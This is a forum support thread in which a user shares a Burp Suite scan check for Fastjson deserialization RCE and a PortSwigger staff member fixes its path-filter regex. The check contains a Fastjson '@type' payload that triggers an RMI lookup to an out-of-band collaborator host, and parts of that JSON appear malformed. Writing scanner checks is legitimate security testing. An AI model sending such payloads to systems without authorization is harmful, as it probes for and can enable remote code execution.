I encountered some problems with path matching.

[Awrrays]

I encountered some problems with path matching.

`metadata:
language: v2-beta
name: "Fastjson Deserialization RCE"
description: "https://paper.seebug.org/1192/"
author: "Javeley"
tags: "Fastjson", "Deserialization", "RCE", "Alibaba"

define:
oobAddress = {generate_collaborator_address()}

run for each:
payload =
[\{"@type": "java.lang.Exception","@type": "com.alibaba.fastjson.JSONException","x": \{"@type": "java.net.InetSocketAddress"\{"address":,"val": "rmi://{oobAddress}/{random_str(4)}"}}},\{"@type": "java.lang.Exception","@type": "com.alibaba.fastjson.JSONException","message": \{"@type": "java.net.InetSocketAddress"\{"address":,"val": "rmi://{oobAddress}/{random_str(4)}"}}}]

given path then
if (not({base.request.url.path} matches ".*.(asp|aspx|ashx|asmx|php|js|css|png|jpg|jpeg|gif|ico|svg|woff|woff2|ttf|eot|pdf|doc|docx|xls|xlsx)")) and
{base.request.body} matches "^[{]" and
"application/json" in {base.request.headers} then
send request:
body: {payload}

    if dns interactions then
        report issue:
            severity: high
            confidence: certain
            detail: "https://paper.seebug.org/1192/."
            remediation: "https://paper.seebug.org/1192/."
    end if
end if`

After adding the filter condition "not({base.request.url.path} matches ".*.(asp|aspx|ashx|asmx|php|js|css|png|jpg|jpeg|gif|ico|svg|woff|woff2|ttf|eot|pdf|doc|docx|xls|xlsx)", running the test resulted in no requests.

[Michelle-PortSwigger]

If you escape the . that would come before the list of file endings in your filer, so your filter looks like this

"not({base.request.url.path} matches ".*\.(asp|aspx|ashx|asmx|php|js|css|png|jpg|jpeg|gif|ico|svg|woff|woff2|ttf|eot|pdf|doc|docx|xls|xlsx)"

does that help?

If not, would you be happy to share a copy of the request you're testing against? You can share this directly with us via support@portswigger.net if you prefer